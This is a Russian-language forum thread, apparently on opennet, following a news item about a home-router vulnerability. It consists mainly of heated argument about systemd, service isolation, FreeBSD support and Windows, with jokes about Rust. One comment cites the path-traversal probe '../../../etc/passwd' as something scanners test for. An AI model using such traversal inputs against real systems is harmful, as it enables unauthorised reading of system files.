Сообщение от Аноним (-), 10-Авг-21, 18:13 
> ты таки можешь починить мне неработающую загрузку?

Unknown. И я не горю желанием узнать. Я не подбирал конфиг, систему и софт и не конфигурил это. Точно могу в системах по _моим_ лекалам, с подобранным (или сделаным) _мной_ хардом и  софтом, в контексте задач в которые я вписался. Пруф? Допустим, мое наличие тут. В фоне примерно дюжина пингвинов машет крыльями. Они приносят меня сюда. У них есть что-то обшее. Но возможно это глюк а меня тут нет.

> А, опять "это другое".

Вероятно, "здорово другое". Сравненивая наши технические предпочтения и подходы. А так я не саппорт твоего дистро и не эникей и не горю желанием разруливать чужие факапы. Я видел твой decision making достаточно :P.

> потому что твой уровень квалификации- нулевой.

Тогда возможно это сон, а я не учил стаи пингвинов летать. Но это не важно. Важно что я знаю одну вещь. Когда кто-то передо мной считает что все знает и видел, лучше всех знает как надо - я тоже кое-что знаю. Например, то что это их call - ответить за свой выбор и решения.

> (по этой же причине для тебя бином ньютона накодить "запускалку с нэймспейсес")

Да не, я это могу и в примитивном виде даже когда-то практиковалось. Но системд в правильном месте, в правильное время, ему сподручнее всего потребные сисколы сделать. И кодить все что он умеет я опухну.

> Кстати и о "приличных доках". Описание миллиона ненужных закорючек - это вообще не доки.

Мне хватило, у меня пингвины полетели. Значит со своей стороны я буду считать что для меня это сработало. А то что тебе не нравится эта концепция - я даже понимаю, но почему бы тебе это честно не сказать? :) Увы, у твоих концепций так то тоже ряд неприятных технических грабель есть - и мне так зело неудобно с моими хотелками было.

> шаг влево-вправо от принесенного тебе на лопате "твой дистро" - и ты
> ничего кроме "ни разу не было" сообщить публике не сможешь.

Я думаю у меня достаточно шагов влево и вправо - и я так то исторически решал самые странные проблемы. Вплоть до непонятных кернелпаник после апгрейда ядра. Но мое дистро достаточно дружественно к тому и вообще дает старт толпе деривативов. Зачем все делать х-во и сложно? :)

> кто-то жрет с лопаты, кто-то все еще иногда строит свои системы без
> невменяемого г-на, где еще возможно.

Ну, более вменяемых решений от тебя или кого либо, позволяющих прописать несколькими строками в конфиг шедулеры, приоритеты, неймспейсы и зарубание сисколов мне как-то не попадалось. У альтов что-то такое было, но они почему-то считали что это только девам надо, а встроеные в систему сервисы этого недостойны. У меня другие идеи на этот счет.

> Угу.

Да ну хватит ерничать, скажи честно что тебе концепция не нравится. Я даже пойму, но у темной стороны есть и свои печеньки.

Ответить | Правка | К родителю #254 | Наверх | Cообщить модератору

271. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от пох. (?), 10-Авг-21, 21:38 
> Тогда возможно это сон, а я не учил стаи пингвинов летать.

разумеется, нет. Подобрал на помойке то что получилось кое-как завести готовыми тулзами, изменить что-то в которых не сможешь. В том числе в виду отсутствия знаний, но и были бы - не помогло бы, еще вечная жизнь нужна и бесконечные деньги. Вот те кто эти тулы писали - те учили и научили. Ну как могли - нызенько и какввенде.

Потому что недавно как раз системдряньцы выложили таки документацию (не манпейджи, а _документацию_) - и ничего кроме смеха курей она не вызвала. А до этого десять лет вообще никакой не было.

"программа хорошо документирована своим исходным кодом". Но нет, увы, и это тоже не про них - код вермишель.

> Да не, я это могу и в примитивном виде даже когда-то практиковалось. Но системд в правильном
> месте, в правильное время,

в правильном месте и в правильное время - это как раз "в примитивном виде" одной тривиальной утилитой. Которая переключает нэймспейс и больше _ничего_ лишнего не делает. Но вот беда - место и время надо уметь определить самому (или вовремя понять что оно тут совершенно лишне, например потому что в системе маршрутизатор-его вебморда у вебморды по определению должен быть доступ к настройкам маршрутизатора, а больше там и быть ничего не должно).

Но так сейчас немодно.

> Да ну хватит ерничать, скажи честно что тебе концепция не нравится.

концепция выбора дерьма из дерьма? Да, не нравится.

Концепция "как ввенде" (если бы дерьмо хотя бы просто работало как надо) - тоже не нравится, одна-то винда у меня уже есть, зачем бы мне вторая была нужна. Юникс-систем, увы, снова нет.

Ну, может лет через двадцать снова научатся строить из простых и понятных кирпичиков, каждый из которых можно самостоятельно поменять или убрать, не разрушив всю конструкцию. Но вряд ли.

Ответить | Правка | К родителю #262 | Наверх | Cообщить модератору

299. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (-), 11-Авг-21, 13:14 
> разумеется, нет.

Ты в чем-то прав, если ты имел в виду что я для того чтобы взлететь оперся на плечи гигантов. А почему нет, если так можно было и это неплохо сработало?

> Подобрал на помойке то что получилось кое-как завести готовыми тулзами,

Где-то готовыми, где-то не готовыми. Где-то целиком переизобретены лично вплоть до reset handler'а. Случаи разные бывают. Самолично ВСЕ изобретать - ты даже медяку для дорожек на плате компа не выплавишь. Значит придется делегировать другим. Да, частичная утрата контроля, но масштаб и характер проблемы сильно варьируется.

> изменить что-то в которых не сможешь.

Как раз пингвин крут тем что я могу изогнуть егор даже под нетипичные задачи. У меня есть свой выводок патчей на kernel и проч. Мои конфиги ядра изрядно отличаются от дистровских, и на то были хорошие причины. Конфигурации систем имеет мало общего с дефолтами.

Например: почти все кернелы - мои. С lockdown. А ключи - лично мои. Система доверяет *мне*. И шлет в зад остальных. Это моя система. Она служит мне. I have controls.

А вот с виндой например я так не смог бы. И контролируется она другими, начиная с тех ключей. Поэтому когда мне это говорит продвигающий винду тип - ну, э, лол.

> В том числе в виду отсутствия знаний, но и были бы - не помогло бы,

Я не могу знать все. И все же, вроде не так уж плохо работает на практике, а недостающие знания можно и подучить по ходу пьесы. Я всегда учусь. Если я не узнал что-то за день, он прожит зря.

И так или иначе - я могу решить все системные проблемы и допинать это до кондиции, достигнув желаемых параметров и изогнув поведение в желаемом виде.

> еще вечная жизнь нужна и бесконечные деньги.

Я, вроде, не Рокфеллер и даже не МакЛауд...

> Вот те кто эти тулы писали - те учили и научили. Ну как могли - нызенько и какввенде.

Если я могу потрогать палочкой это - значит и я чему-то научился. В каких-то частях меньше, в каких-то больше, но в конечном итоге - это работает. И в конце дня это главный критерий pass/fail. И не хожу по форумам, рассказывая как у меня системы не грузятся или как я на винду свалил. Я в состоянии решить системные проблемы. И помощь зала мне требовалась ну может 1-2 раза за последние 3 года, на эмбедовке, с странными факапами которые тебе в ночных кошмарах не снились.

> Потому что недавно как раз системдряньцы выложили таки документацию (не манпейджи,

Мне как-то хватило манов. Ахренли, есть искаропки и достаточно для понимания основных сущностей, а see also нормально посылает.

> не про них - код вермишель.

Честно говоря у меня не было серьезных причин лезть в именно его сорец. Черт в последних версиях они даже сделали вгруз random seed кернелу нормально, на эмбедовке и vm очень полезно, там с entropy бывает полный трэш, ведущий к весьма неординарным системным факапам.

> в правильном месте и в правильное время - это как раз "в примитивном виде"
> одной тривиальной утилитой.

Есть нюансы:
1) Это должно уже запущено резидентом. Ибо если мы всерьез про сбор изолированого окруженрия, основная ФС сейчас перестанет существовать, и мы с нее ничего вгрузить не сможем, ни исполняемые, ни либы, ни конфиги.
2) Это должно быть весьма привилегированым. Без этого невозможен сетап арены изолированного окружения, многие сисколы привилегированые. Ибо если юзеры начнут так щелкать секурити, начнется полная вакханалия, а всякие bounding set, запреты сисколов и проч билет в 1 сторону.

В итоге получается что systemd как раз в подходящем времени и месте с нужными правами и может это сделать как надо. Комплексно. В верном порядке.

> Которая переключает нэймспейс и больше _ничего_ лишнего не делает.

Есть нюансы: когда мы пытаемся сделать комплексную изоляцию, мы замечаем что после этого нам недоступны утилиты и мы больше нифига не можем. А мы еще хотели шедулеры поменять, сисколы запретить, что-то домаунтить чтобы система не лысая была, CAPSы обрубить и проч. И нет, я не хочу делать сетевому сервису доступными программы для этого. Серверу в крейсерском режиме все это нахрен не надо, не считая апгрейд прав хаксорами. Пусть им будет неудобно и паливно по настоящему, или где? :)

> Но вот беда - место и время надо уметь определить самому (или вовремя понять что
> оно тут совершенно лишне, например потому что в системе маршрутизатор-его
> вебморда у вебморды по определению должен быть доступ к настройкам маршрутизатора,

Вижу вариант когда вебсервер можно обуть на права: сделать межпроцессный интерфейс. Относительно секурный, таскспецифичный. Через котоырй вебсерв с бэком коммуницировать будет. бэк может не уметь ничего кроме полутора операций ломать нечего.

Еще вариант с вызовом сервером привилегированных хелперов, с SUID или CAPSами на оные.

См qemu vs сеть например. Работает и под юзером который сеть не может трогать. Также может сесть на pre-configured сеть, появившуюся "какой-то магией". Не его епархия как, если это обеспечено.

> а больше там и быть ничего не должно).

Так и запишем, пох не слышал про least privileges и даст ломовые права вебсерверу. Я этого делать не буду.

> Но так сейчас немодно.

Да уж, взялись права урезать сервисам - хакеры негодуют.

> концепция выбора дерьма из дерьма? Да, не нравится.

Дык некоторые вещи до этого были еще большим этим самым. Но свое тебе не пахло.

> Концепция "как ввенде" (если бы дерьмо хотя бы просто работало как надо)

Да оно не как в винде вроде. Некий гибрид, отовсюду понемногу. Тут позвать скрипт это 1 строка конфига, а в регэдите с svcmgr или как там его я этот номер не возьмусь повторить, и с диагностикой там будет совсем задник.

> бы мне вторая была нужна. Юникс-систем, увы, снова нет.

А черт знает, куда мне девать юникс систем в чистом виде? Оно не очень практичная в чистом виде штука, кроме академ концепций. Но эксплуатация систем в крейсерском режиме заметно отличается от этого. А долботня с системами если это потом не даст вот то - лично мне не надо.

> Ну, может лет через двадцать снова научатся строить из простых и понятных
> кирпичиков, каждый из которых можно самостоятельно поменять или убрать, не разрушив
> всю конструкцию. Но вряд ли.

В принципе нормальный виш. Однако есть некоторые технические нюансы, например при сборке изолированных окружений. Там sequencing зело хитрый и для внешних программ трабл в том что сук уже спилен, звать нечего. Резидентный привилегированый процесс делающий ВСЕ не имеет данной проблемы. Вероятно это привело к тому tradeoff.

Ответить | Правка | К родителю #271 | Наверх | Cообщить модератору

303. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от пох. (?), 11-Авг-21, 13:43 
> Ты в чем-то прав, если ты имел в виду что я для того чтобы взлететь оперся на плечи гигантов.
> А почему нет

Потому что речь о квалификации. Которой у тебя нет, поэтому ты и не в состоянии оценить насколько стал убог изуродованный системдрянью линукс.

И продолжаешь нести чушь про неправильные дистрибутивы, неправильное то, неправильное сё. И болтать о том чего я якобы не умею - хотя ты не умеешь банально понимать задачи и рамки их решений.

> Например: почти все кернелы - мои. С lockdown. А ключи - лично мои. Система доверяет *мне*. И
> шлет в зад остальных. Это моя система.

когда ж вы повзрослеете-то...

> Это моя система. Она служит мне. I have controls.

не-а. Что тебе на лопате дали, то и хаваешь. Молясь чтоб в "твоем" не оказалось патча из минесоты, или еще кого. И даже не понимаешь ни единого слова в моих примерах.

> И нет, я не хочу делать сетевому сервису доступными программы для этого.

эти программы работают только в одну сторону - вниз. От наличия бинарника ничего не изменится (правильно хакнутый сервис прекрасно обошелся бы и без него, одним пэйлоадом). Вот твой уровень непонимания тривиальных вещей. А сейчас у тебя в памяти невменяемая блоатварь с pid1, и ей-то как раз доступно всё, свои привилегии она не сбрасывает и не может. Твоя система? Да чего там твоего-то, два васянских патча непойми чего, да и те, если потыкать палочкой, окажутся дырой на дыре.

> Вижу вариант когда вебсервер можно обуть на права: сделать межпроцессный интерфейс.
> Относительно секурный, таскспецифичный. Через котоырй вебсерв с бэком коммуницировать будет.
> бэк может не уметь ничего кроме полутора операций

и соответственно нидлячего и не будет нужен. А если через него роутер настраивается полноценно - значит он имеет больше чем достаточно опасных умений. И вот, удобный межпроцессный интерфейс как раз в том что смотрит наружу.

Ответить | Правка | К родителю #299 | Наверх | Cообщить модератору

312. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (-), 11-Авг-21, 15:46 
> Потому что речь о квалификации. Которой у тебя нет,

Все познается в сравнении. Как минимум, у меня все грузится, работает, и мне не требуется идти на поклон к мерзкософт корпорейшн, наслаждайсь офигенным предложением с онлайнакаунтами, кейлогерами и рекламой за свои деньги. А системное эстетство прекрасно, но когда заводит вон туда, ну его нафиг, назло бабушке^W Поттерингу вон то жрать.

> поэтому ты и не в состоянии оценить насколько стал убог изуродованный системдрянью линукс.

Вот именно _линукс_ вообще ядро. А то что энное семейство юзермодов стало юзать системд, на то были причины. Есть и те кто не стал. Но ты считаешь их лохами, желая Крутой Энтерпрайз. Именно Крутой Энтерпрайз в первых рядах фичесет системд требовал. Ты хочешь влезть на елку и не ободрать зад.

> И продолжаешь нести чушь про неправильные дистрибутивы, неправильное то, неправильное сё.

Я сознательно ограничил scope своих умений на subset технологий, чтобы научиться в нем выше среднего. И самое логичное что можно придумать это прокачаться в тех технологиях которые юзаешь для себя, удачная стартовая позиция. А так мир большой и сложный, я не могу знать всего. Я не умею крестиком вышивать, но это можно пережить.

> И болтать о том чего я якобы не умею - хотя ты не умеешь банально понимать
> задачи и рамки их решений.

Ты не мой манагер и не кастомер, твои задачи - твои проблемы.

> когда ж вы повзрослеете-то...

Смотря что под этим понимать. Если отлизывание майкрософту на идиотских условиях, имхо, никогда.

> не-а. Что тебе на лопате дали, то и хаваешь.

Не совсем. Оно основательно переконфигурено и настроено, а порой и пропатчено под себя и задачи. И я сходу не назову структуру сравнимого размера где я смогу это лучше, вот ведь какой нюанс.

> Молясь чтоб в "твоем" не оказалось патча из минесоты, или еще кого. И даже
> не понимаешь ни единого слова в моих примерах.

В любой достаточно большой структуре всегда есть некий риск факапа, и летя в самолете ты тоже молишься, чтобы двигатель прочекали на совесть и гайки закрутили как надо. И таки иногда с этим выходит фэйл, потому что большая штука...

> эти программы работают только в одну сторону - вниз.

В лучшем случае это даже, однако это как минимум может добавить барахла в всевозможные списки и конфигурации. А чем лаконичнее и проще конфигурация, тем проще ее запилить.

> От наличия бинарника ничего не изменится (правильно хакнутый сервис прекрасно
> обошелся бы и без него, одним пэйлоадом).

Это достаточно геморройно, кроме того бинарники могут иметь кастомные права, типа CAPS или SUID. Ибо сервис задуман под лимитированым юзером, а тот таких правов не имеет, в этом месте случается небольшой облом. Получается что в каждом сервисе нужно толи его сам вот так патчить, толи какой-то костыль-запускалку пинаемую от рута всем подкладывать, и получится изобретение системды, только еще хреновее, кривее, и через ж...у.

> раз доступно всё, свои привилегии она не сбрасывает и не может.

Однако после отпиливания сервиса, блоатварь ему не обязана быть доступна вообще. И в этом случае - ну, блоатварь где-то там. Outside of context.

> Твоя система? Да чего там твоего-то, два васянских патча непойми чего,
> да и те, если потыкать палочкой, окажутся дырой на дыре.

А также общая координация и интеграция этого во что-то делающее нечто осмысленное, в виде как это было задумано. А то что я встал на плечи гигантов - да, и не отрицаю это.

Ты в своем праве показать как это делать по другому. Но пока я видел только нытье и рекламу винды, и это было не очень то эпично и убедительно.

> и соответственно нидлячего и не будет нужен.

Он будет выполнять ровно те задачи для которых поставлен. Показ вебморды. Тебя не смущает что в openwrt фактическая конфигурация аплаится отдельной жирной и небыстрой шляпой? Вот что-то такое можно и более круто развязать друг от друга.

> А если через него роутер настраивается полноценно - значит он имеет больше
> чем достаточно опасных умений.

ИМХО сунуть конфигурацию в сам HTTP имеет смысл только при остром душняке места, когда это перевешивает все остальные негативные последствия, в том числе и хромую секурити. Но, может быть тебе нравится сабж. А мне - нет. По крайней мере я сделаю абсолютно все, чтобы такие вещи не случались на системах к которым я имею какое-то отношение.

> И вот, удобный межпроцессный интерфейс как раз в том что смотрит наружу.

Его не надо наружу вывешивать, и он даже не обязан быть "сетью" в упомянутом случае. А то что индусня мастерски стреляет себе в пятку, я никогда не сомневался. Это не значит что я буду так же. Кто-то должен показать что можно и секурнее чем этот позорный трэш. Одним из таковых буду я.

Ответить | Правка | К родителю #303 | Наверх | Cообщить модератору

316. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от пох. (?), 11-Авг-21, 17:25 
> Все познается в сравнении. Как минимум, у меня все грузится, работает,

у тебя только то что на что ты осилил поставить не тобой не только разработанное, но и не тобой управляемое - тебе доступны полторы ручки. Той формы и для того отверстия, которое им, не тебе, показалось удобным.
А ниасилимое заранее объявлено ненужным.

> и мне не требуется идти на поклон к мерзкософт корпорейшн

дооо, дооо, конечно же ibm с нате на лопате кланяться гораздо лучше, и спине полезнее

> Не совсем. Оно основательно переконфигурено и настроено,

судя по неумению отличать маны от документации - это тоже исключительно фантазии. На уровне детского сада - да, можешь. Выше - заранее "не твои задачи", угу.

> Ты в своем праве показать как это делать по другому.

что "это" - надувать щеки что система якобы тебе подконтрольна, не зная о ней толком ничего? Извини, не мой бизнес.

> А чем лаконичнее и проще конфигурация, тем проще ее запилить.

а тонна плохого сишного кода заранее выносится за скобки. Это ведь не конфигурация? А что она определяет поведение твоей системы от и до, оставляя тебе лишь пару неудобных ручек - делаем вид что не заметили. Затонемикрософт!

Ну ок, уровень понятен. Когда-нибудь может повзрослеешь.

Ответить | Правка | К родителю #312 | Наверх | Cообщить модератору

324. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от andy (??), 12-Авг-21, 08:29 
> концепция выбора дерьма из дерьма? Да, не нравится.

Это понятно, мало кому понравится.

> Концепция "как ввенде" (если бы дерьмо хотя бы просто работало как надо)
> - тоже не нравится, одна-то винда у меня уже есть, зачем
> бы мне вторая была нужна.

Тоже понятно

> Юникс-систем, увы, снова нет.

Почему нет? Вон, Solaris 11 еще шевелится.

> Ну, может лет через двадцать снова научатся строить из простых и понятных
> кирпичиков, каждый из которых можно самостоятельно поменять или убрать, не разрушив
> всю конструкцию. Но вряд ли.

Слушай, пох, а что тебе нравится? Есть же что-то из операционных систем, пусть часть из них уже история, поработав с которыми у тебя остались положительные, а не гнетущие впечатления?

Ответить | Правка | К родителю #271 | Наверх | Cообщить модератору

325. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от пох. (?), 12-Авг-21, 11:19 
>> Юникс-систем, увы, снова нет.
> Почему нет? Вон, Solaris 11 еще шевелится.

это уже конвульсии. Там всех разработчиков уволили еще три года назад, нет уже просто людей, знающих как оно устроено и что для чего делалось. Остались собиратели пакетов и исправлятели тривиальных багов. Нетривиальные уже тоже некому, тех умных теток-инженеров давно тоже нет.

> Слушай, пох, а что тебе нравится?

да мне, в принципе, винда вполне себе нравится - ее, конечно, тоже очень сильно испортили за последние годы альтернативно-одаренные, но есть и позитивные моменты - тот же павершелл за те же годы из малопонятной поделки превратился в полноценный инструмент администрежа, многие вещи давно уже только там. Ну и если тебе нужна концепция десктопа - так вот она, и реально работает.

А так - мне вполне нравился и линукс образца 2000го, когда я еще мог в нем что-то исправлять сам, да и комьюнити не казалось таким безнадежным (звоночки уже звенели, да, devfs особенно). Вполне ничего себе так была фря восьмой версии (да и четвертой, с поправкой на те годы), и жили такие у меня по десятку лет, иногда пережив начисто те проекты ради которых ставились.

Ответить | Правка | К родителю #324 | Наверх | Cообщить модератору

327. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от andy (??), 12-Авг-21, 13:43 
> А так - мне вполне нравился и линукс образца 2000го, когда я
> еще мог в нем что-то исправлять сам,

Я тогда не работал с linux'ом. Я правильно понимаю, что сейчас тебе
мешает поправить что-то самому забюрократизированный апстрим, который
просто не примет исправления за разумное время?

> да и комьюнити не казалось таким безнадежным (звоночки уже звенели, да, devfs особенно). Вполне

А что не так с devfs было, ее в 2009 кажется, заменили в linux'е на udev?

> ничего себе так была фря восьмой версии (да и четвертой, с поправкой
> на те годы),

FreeBSD 6 не понравилась?

> и жили такие у меня по десятку лет,
> иногда пережив начисто те проекты ради которых ставились.

Ответить | Правка | К родителю #325 | Наверх | Cообщить модератору

332. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от пох. (?), 12-Авг-21, 14:49 
> мешает поправить что-то самому забюрократизированный апстрим, который
> просто не примет исправления за разумное время?

нет, так было всегда. Начиная с так и не принятого фикса сброса scsi cache, из-за которого портились диски при шатдауне. Сейчас мешает то что размеры чудовища таковы, что это fulltime job только на изучение всех нужных и важных api.

А документация даже хуже того что было в 2000м.

> А что не так с devfs было

то же что сейчас с ntfs3, только она еще и имела несчастье не нравиться лично его Владычеству, с пальцем. Несколько лет переписывания в погоне за нонсенсами, попытки выполнить все безумные хотелки и придирки, и в конце-концов автору надоело.

А вот udev - кого надо нога, это важно и нужно для дрисктопа.

> FreeBSD 6 не понравилась?

6 только-только оклемалась от переходного периода, и при этом в ней не было каких-то прям нужных и полезных мне киллерфич. А вот восемь была и надежной, и имела работающий zfs, и от статических структур в ядре окончательно ушли именно к ней. Ну, она и прожила какое-то совершенно уникально долгое время, как и четверка.

И могла бы и еще пожить, если бы не странная логика пацанчиков из iX и около.

Ответить | Правка | К родителю #327 | Наверх | Cообщить модератору

333. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от andy (??), 12-Авг-21, 16:20 
> И могла бы и еще пожить, если бы не странная логика пацанчиков
> из iX и около.

А они что сделали?

P.S: User, ты тут?

Ответить | Правка | К родителю #332 | Наверх | Cообщить модератору

334. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от пох. (?), 12-Авг-21, 16:47 
ну, нечеловеческим усилием их удалось уговорить на timezone update после уже "полного и окончательного" EOL, а так - ничего они не сделали, при этом непонятный хмырь продолжал комитить в эту ветку еще пару лет - но какой-то совершенно ему одному нужный мусор, а не, к примеру, фикс дыры в sshd или локальный рут на x64.

т.е исправления есть, их легко бэкпортировать, это серьезная проблема - но мы не будем, патамушта еол и другим не дадим. А что кто-то там ковыряет что-то непонятно зачем - это кого надо нога, его еол не касается.

Ответить | Правка | К родителю #333 | Наверх | Cообщить модератору

335. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от andy (??), 12-Авг-21, 17:45 
> ну, нечеловеческим усилием их удалось уговорить на timezone update после уже "полного
> и окончательного" EOL, а так - ничего они не сделали, при
> этом непонятный хмырь продолжал комитить в эту ветку еще пару лет
> - но какой-то совершенно ему одному нужный мусор, а не, к
> примеру, фикс дыры в sshd или локальный рут на x64.
> т.е исправления есть, их легко бэкпортировать, это серьезная проблема - но мы
> не будем, патамушта еол и другим не дадим. А что кто-то
> там ковыряет что-то непонятно зачем - это кого надо нога, его
> еол не касается.

А почему нельзя было на актуальную ветку перейти?

Ответить | Правка | К родителю #334 | Наверх | Cообщить модератору

336. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от пох. (?), 12-Авг-21, 20:24 
потому что как обычно, у актуальной много чего поломано, требования к железу выше, и если я _уже_ пользуюсь неактуальной - значит мне нафиг не нужны те фичи которых в ней нет - иначе бы я чем-то другим пользовался, а не ждал жва года ебилдов. Соответственно, мне нафиг не нужен геморрой с обновлением на живую.

И ладно б на нее совсем болт забили и строем пошли на новые-модные 9-10, нет, нифига - кто-то комитит непонятное что-то. Ему можно.

Ответить | Правка | К родителю #335 | Наверх | Cообщить модератору

337. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от andy (??), 12-Авг-21, 20:28 
> И ладно б на нее совсем болт забили и строем пошли на
> новые-модные 9-10, нет, нифига - кто-то комитит непонятное что-то. Ему можно.

А локальное зеркало с ядра/мира с нужными патчами поддерживать накладно было?

Ответить | Правка | К родителю #336 | Наверх | Cообщить модератору

338. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от пох. (?), 12-Авг-21, 21:09 
нужные патчи еще нужно вовремя заметить и вовремя сбэкпортить.

А поскольку это все уже для себя делалось, то мне быстро расхотелось и я на некоторое время снова ушел на линуксы в качестве инструментальной платформы.

Ответить | Правка | К родителю #337 | Наверх | Cообщить модератору

162. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 19:10 
ЗЫ по моему проверки на ../../../etc/passwd умели даже штуки типа нмапа. И там штук цать проверок такого плана на всю типовую лажу. КМК, писаный за вечер HTTP хоть там на чем - на половине этого срежется.

А из главных фич всякой экзотичной проприетари обычно является маркетинговый булшит в уши манагерам и гламурные буклеты. А так некоторые и обычный thttpd юзают. Его вроде даже сам по себе не особо выносят но какие-нибудь гамноскрипты писаные индусами все-равно могут испортить компот.

Ответить | Правка | К родителю #146 | Наверх | Cообщить модератору

166. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от пох. (?), 09-Авг-21, 19:22 
> ЗЫ по моему проверки на ../../../etc/passwd умели даже штуки типа нмапа. И

да, но посмотри эту увизгвимость - там гораздо интереснее факапы с подстановкой переменной управляющей индусским скриптом.

такое вряд ли можно кроме как реверсом угадать.

> А из главных фич всякой экзотичной проприетари обычно является маркетинговый булшит в
> уши манагерам и гламурные буклеты. А так некоторые и обычный thttpd

боюсь там будут проблемы с CORS и прочими модными штуками. Не то чтоб прям опастносте-опастносте, но либо что-то сломаешь, либо наоборот при заходе на порносайт заодно перезагрузится конфигурация роутера.

Ответить | Правка | Наверх | Cообщить модератору

237. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 10-Авг-21, 11:31 
> да, но посмотри эту увизгвимость - там гораздо интереснее факапы с подстановкой
> переменной управляющей индусским скриптом.
> такое вряд ли можно кроме как реверсом угадать.

Ну вот это уже видимо кто-то проштудировал начинку этого нечто. А что, народа который это делает море. Майки недавно скупили один тулкит для подобного как раз. Понятия не имею нахрен им кусок питона для RE, может, чтобы убить его, дабы в их софте этим не копались? Но как мне кажется, от этого эффект будет крайне маргинальным. А что может хотеть реверсить майкрософт я как-то не очень себе представляю.

> боюсь там будут проблемы с CORS и прочими модными штуками. Не то
> чтоб прям опастносте-опастносте, но либо что-то сломаешь, либо наоборот при заходе
> на порносайт заодно перезагрузится конфигурация роутера.

Говоря за себя - я в курсе подобных вещей и всегда учитываю это.

Ответить | Правка | Наверх | Cообщить модератору

5. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –6 +/
Сообщение от Аноним (-), 09-Авг-21, 11:17 
И никакой Rust бы не помог (у которого нашли точно такую же уязвимость в масках IP-адресов).
Ответить | Правка | Наверх | Cообщить модератору

9. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от OnTheEdge (ok), 09-Авг-21, 11:25 
точно такую же? уверены?
Ответить | Правка | Наверх | Cообщить модератору

26. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (26), 09-Авг-21, 12:09 
Ты еще и в сортах дыр разбираешься?
Ответить | Правка | Наверх | Cообщить модератору

41. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от OnTheEdge (ok), 09-Авг-21, 12:54 
было бы в чём: сишные и несишные
Ответить | Правка | Наверх | Cообщить модератору

130. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –3 +/
Сообщение от Аноним (130), 09-Авг-21, 17:18 
Нет, у раста нашли куда хуже. А куда хуже это потому что в самом раст
Ответить | Правка | К родителю #9 | Наверх | Cообщить модератору

135. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (291), 09-Авг-21, 17:27 
Есть непроверенная инфа, что на расте можно написать программу, которая удаляет все файлы в системе.

Если подтвердится - будет пушка.

Ответить | Правка | Наверх | Cообщить модератору

231. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (231), 10-Авг-21, 10:12 
Язык программирования, с помощью которого невозможно спалить процессор - плохой язык. А уж удалить все файлы в системе - это минимум.
Ответить | Правка | Наверх | Cообщить модератору

340. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Артур (??), 17-Авг-21, 09:33 
Так это и на Bash'е (а соответственно и на любом другом языке) можно!
Это вопросы ОСи, а не языков.
Ответить | Правка | К родителю #135 | Наверх | Cообщить модератору

142. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +2 +/
Сообщение от Аноним (-), 09-Авг-21, 17:56 
> точно такую же? уверены?

Да похожего свойства, неаккуратная работа с данными. Так в принципе на любом ЯП лохануться можно. Если вы отгружаете ремоте файлы - вас могут здорово залошить странными именами файлов.

Ответить | Правка | К родителю #9 | Наверх | Cообщить модератору

25. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (26), 09-Авг-21, 12:08 
Если верить то и святая вода защитит. А ты еретик, десять плетей тебе.
Ответить | Правка | К родителю #5 | Наверх | Cообщить модератору

32. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +5 +/
Сообщение от Аноним (32), 09-Авг-21, 12:33 
С одной стороны - да, забыть про urlencode можно на любой языке.
С другой стороны - в расте приветствуется переиспользование кода в виде готовых модулей, типа https://docs.rs/url/, и там такой ошибки нет.
Ответить | Правка | К родителю #5 | Наверх | Cообщить модератору

38. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от Урри (ok), 09-Авг-21, 12:48 
И сколько будет весить решение на расте? Влезет в прошивку роутера?

А заодно насколько надежно будет работать на разных платформах, на которых работают роутеры?
Раст обещает, что ваши arm, mips, ppc и т.д. программы скомпилятся, но не обещает, что запустятся.

И вообще, получится хотя бы перекомпилировать ваш код через год, когда выйдет 14 новых версий раста, через одну ломающих обратную совместимость?

Ответить | Правка | Наверх | Cообщить модератору

52. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Аноним (52), 09-Авг-21, 13:11 
Щас они притащат библиотеку раста и упихают ее в 4мб флеш памяти вместе с последним ядром. Они же на расте и не такое могут. Сейчас вот прям пойдут и напишут архиватор, который на расте будет быстрее работать, чем Сишные архиваторы, а сжимать будет в 100 раз лучше.
Ответить | Правка | Наверх | Cообщить модератору

